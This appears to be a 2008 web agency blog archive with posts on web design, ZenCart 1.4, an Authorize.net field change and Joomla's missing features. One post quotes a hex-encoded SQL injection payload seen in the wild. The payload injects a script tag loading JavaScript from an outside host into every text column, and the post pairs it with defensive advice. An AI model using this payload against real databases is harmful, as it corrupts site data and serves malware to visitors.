Archive

Archive for August, 2008

Inspiring Commentary Article on Web Design Practices

August 27th, 2008
Comments Off

Written by Kimberly Elam, Web Design by Design made me think twice before running to draft the next web site design with our designer. This same minimalistic approach of almost too little but just enough to make a clear point approach is great because it begs for more. As Kimberly puts it, the user remains hungry for more information. And guess what they will probably do? call or email for more information!

This article highlites the a similar line of thought for successful web firms: they target what their clients need not what they can do with technology or design. Hence this comes to remind us that websites, in any aspect: design or web development, are here to serve the business. A website is just a tool not the goal.

This comes accross with our line of though at Activo: each one of our proposals begin with what are the goals in this project. In other words, what will we achieve by the following web development project?

Web Design, Web Development, Web-based User Interfaces , ,

Looking Ahead: ZenCart ver 1.4

August 25th, 2008

The ZenCart developer team seems to be hard at work and preparing to deliver a new version of ZenCart: ver 1.4. The core developers posted a roadmap brief for version 1.4 back in September of 2007. Recently, additional entries have been posted in the forums describing in more detail the upcoming changes and signaling a new release is to be expected soon.

The currently described updates to ZenCart are done all around the DB, its architecture, and improving its performance. To summarise from the ZenCart forums:

New Database Driver Layer
Extremely light/flexible drivers make it easier to support other Database Types
Preliminary support for innodb and mysql transactions

Sql Caching system rewritten
Much easier to add new caching types
Preliminary Support for Memcache

Use of MPTT for category structure
Reduces number of queries needed to ‘describe’ the category structure
Improves user experience thru reduced page load times

Supporting Classes to reduce query load
Hugely reduces queries needed
Reuses queries using Cache to further improve performance

The roadmap for ZenCart ver 1.4 promises the following updates to the code (summarized):

  • Better usage of PHP 5.2 features. This also means 5.2 will be the new minimum requirement.
  • More Object Oriented code, less of the old osCommerce code.
  • Lots of DB improvements (some is described above, seems more is yet to come).
  • Category structure converted to MPTT format. MPTT stands for Modified Preorder Tree Traversal (explanation of MPTT).
  • Performance improvements for sites with lots of product attributes.
  • More function libraries converted to classes.
  • Duplicate components shared between admin and catalog.
  • Template system enhancements: less tables and more admin control.
  • Additional notifiers for the observer system.
  • Transaction support with InnoDB. Also mentioned as initial stage according to the recent posts of the updates that were done so far.
  • SwiftMailer instead of phpMailer.
  • Stock and SKU per product attribute.
  • Security enhancements.

Keep up the good work!

eCommerce, PHP/MySQL, Web Development, ZenCart , , , , , , , ,

Authorize.net changes Transaction ID field – ZenCart passes tests

August 21st, 2008
Comments Off

Just a quick note that Authorize.net will be upping the limit on the transaction id field. Apperently, they are close to reaching the limit of the field type, so they are adding digits to the field – we are talking about some really big numbers! ZenCart seems to have acknowledged the news and tested their latest stable release. On ZenCart’s end, all seems to be ok except a small DB change that will only affect shops that choose to store the transactions over time. Hence a quick fix is posted on ZenCart’s forum.

This also means that all plugins, modules, or any Authorize.net integration scripts need to be tested. This change will probably not be a make or break for any code that integrates with Authorize.net APIs, but it is worth verifying your code and your shopping cart just in case.

Originally Posted by Authorize.net:

What is going on with the Transaction ID field?
The Transaction ID field was originally developed with a maximum numeric value of 2,147,483,647. As the number of merchants using the Authorize.Net Payment Gateway has grown, we have identified a time in the near future in which the Transaction ID count will surpass 2,147,483,647. For this reason, we are in the process of expanding the range of Transaction IDs that the payment gateway can issue. Accordingly, we are communicating to all Authorize.Net merchants to verify that your systems can accommodate a 10-digit Transaction ID greater than 2,147,483,647.

eCommerce, Web Development, ZenCart , , ,

Hack attempt: SQL Injection Tagreting MS SQL Servers

August 19th, 2008
Comments Off

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Using the following web application best practices, we avoid getting hacked:

  • Application level:
    • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
    • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
    • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
  • Database level:
    • Use limited database permissions. For example, for SQL Server, don’t let you application run under the “sa” user. The database user should only have permission in the particular database used by the application.
    • If possible, disable extended stored procedures such as xp_cmdshell.
    • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation.
      Some DBAs have server-wide policies of no Dynamic SQL.

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

.NET Framework, Web Development , , ,

5 Missing Features Preventing Joomla! CMS from Entering the Enterprise CMS Market

August 19th, 2008

You’ll love Joomla! CMS because it is a great open source and free CMS with lots of features, stable releases, and it comes with a huge supporting community. Don’t get us wrong, we love Joomla CMS too and truly believe that this open source application is a big head start for any content based website. But since we used Joomla on many advanced Web 2.0 websites, we have found its limits, and sometimes struggled with those limits to a point of considering other systems or even using a framework instead. Let’s look closer at the missing features:

Looking closer at what features Joomla is missing

1. Directory or node base category structure

This is one of the biggest pain points with using Joomla or trying to explain how to use Joomla to new users. Joomla places all content items within sections and categories. Before Joomla 1.5, all content items were required to be in one of these sections and categories. In other words, the system was limited to a two level categorization and the categorization was enforced. In Joomla 1.5, it is not a requirement, however, if you wish to categorize the content items you must use this archaic system.

So, what’s missing? It needs a node based categorization. Similar to any folder structure out there in any operating system. You can create folders with content items in them and you have a nice flexible and fully comprehensible system. No more workarounds. This will then boost the use of any dynamic plugins that can rely on the folder structure for certain features. A great example is a News & Events section that is needed for almost every serious website: with flexible node system you can create a news folder and an events folder and place your articles there. If in the future you wish to add sub categories to your news – no problem! (with the current and the old system – you’ll have to rethink once you get to a certain depth level).

2. A Real Authorship Path and Publication Mechanism

Yes, it is true that users have multiple levels right out of the box in Joomla. But it lacks any sort of a mechanism that controls the workflow of the content item. Ideally, you will have one user that will add new content items and another that will have to approve before it goes live in a specific section. The publisher user will have the rights to publish only in his/her sections, etc. This is a basic feature in many enterprise content management systems.

3. Content Articles Versioning

In Joomla, once you made the change and hit that save button – there is no way to go back in time and undo your changes. Ideally, Joomla will save every instance of the content item and keep track of its versions. How it does it is not important, whether it uses SVN like versioning which efficiently saves only the diff values, or if it actually saves the entire content item every time a revision is made does not matter. The feature that is missing is the versioning itself.

4. Built In Separation Between ‘Live’ and ‘Staging’ Environments

For businesses that value their websites and understand the sensitivity of them, we always recommend setting up a staging environment. This is where all users, developers, and designers can see the latest revisions before it goes live. It provides another stage of error handling instead of working a fire drill on a regular basis. Many enterprise content management systems have this option as a built-in mechanism. From the same admin panel or work area, the admin presses a button and the latest version of the site is then ‘pushed’ live. We currently have linux scripts that do the job but there is no way for a non-developer to handle this case. Ideally, this needs to be from the admin panel of Joomla.

5. Document Management System (File Manager)

So, we all know that Joomla’s File Manager or ‘Media’ manager is a bit lacking. It has the basic functionality that assists with uploading files, moving, deleting them – but that’s it. A DMS (Document Management System) allows each user to manage their own document area, which in turn allows better handling of uploading and using files with drag and drop controls, and improved management interface for admins that can more easily handle large amount of folders and files.

Conclusion

Joomla CMS is a great open source CMS, no doubt. However, if the above five missing features are added, it will make it easier for us to be able to offer this CMS to the enterprise. For now, the commercial CMS spectrum is what we got to work with for enterprise level content management systems.

Content Management Systems, Joomla, Web Development , , , , ,